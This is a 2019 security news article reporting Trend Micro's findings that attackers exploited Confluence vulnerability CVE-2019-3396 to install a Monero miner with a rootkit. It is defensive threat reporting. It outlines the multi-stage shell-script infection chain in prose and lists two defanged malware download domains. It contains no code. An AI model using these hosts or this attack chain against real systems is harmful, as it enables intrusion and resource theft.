You must Register or Sign in to your Cyware account to perform this action
×Once you are logged in, you will be able to:
Customize your feeds by selecting categories you like
Comment on or Like an article
Receive the latest security stories, trends, and insights in your inbox
Build your profile and login across multiple devices
Bookmark a story and read it later
- Home
- Hacker News
- Malware and Vulnerabilities
- Attackers leverage Confluence Server vulnerability to spread Monero mining malware

Attackers leverage Confluence Server vulnerability to spread Monero mining malware
Attackers leverage Confluence Server vulnerability to spread Monero mining malware- May 8, 2019
- |
- Malware and Vulnerabilities
/https://cystory-images.s3.amazonaws.com/shutterstock_352324304.jpg)
- The malware comes packed with a rootkit that is used to hide the malicious activities of the attackers.
- The attack begins with attackers sending a command to download a shell script hosted on Pastebin.
Attackers are recently exploiting a well-known Confluence Server and Data Center vulnerability to spread a Monero mining malware. The malware comes packed with a rootkit that is used to hide the malicious activities of the attackers.
What’s the matter?
In a report, Augusto Remillano II and Robert Malagad from Trend Micro have revealed that the attackers are leveraging the vulnerability - CVE-2019-3396 - to deliver a Monero cryptocurrency miner with a rootkit component. The miner is detected as Coinminer.Linux.MALXMR.UWEJI.
How does the attack occur?
The attack begins when attackers send a command to download a shell script hosted on Pastebin. After killing some processes, the script downloads and runs the second shell script. The file in the second script drops a third shell script that is responsible for downloading a trojan dropper from the following servers:
- gwjyhs[.]com
- Img[.]sobot[.]com
What is the purpose of the rootkit?
The rootkit used in the campaign is detected as Rootkit.Linux.KERBERDS.A. Its main aim is to hide the malware from detection.
“Unlike the older rootkit that only hooks the readdir function to hide the mining process, this new version hooks more functions. It hides not only the mining process but also certain files and network traffic. It is also capable of forging the machine’s CPU usage,” researchers explained.
Bottom line
The same vulnerability has been previously used to distribute GandCrab v5.2 and a variant of AESDDoS botnet. Given the wide exploitation of the vulnerability, Atlassian has released a security update to fix the issue. Thus, users are advised to apply the patch in order to stay safe from such attacks.
Get such articles in your inbox
News
-
Previous News Newly discovered ATMitch malware sample found to be active in the wild since 2017
- May 8, 2019
- |
- Malware and Vulnerabilities
Popular News
Related News
-
Atlassian back 1Password with $US500m investment
- November 25, 2019
- |
- Companies to Watch
Categories
Get such articles in your inbox
News
-
Previous News Newly discovered ATMitch malware sample found to be active in the wild since 2017
- May 8, 2019
- |
- Malware and Vulnerabilities
Popular News
Related News
-
Atlassian back 1Password with $US500m investment
- November 25, 2019
- |
- Companies to Watch
Categories
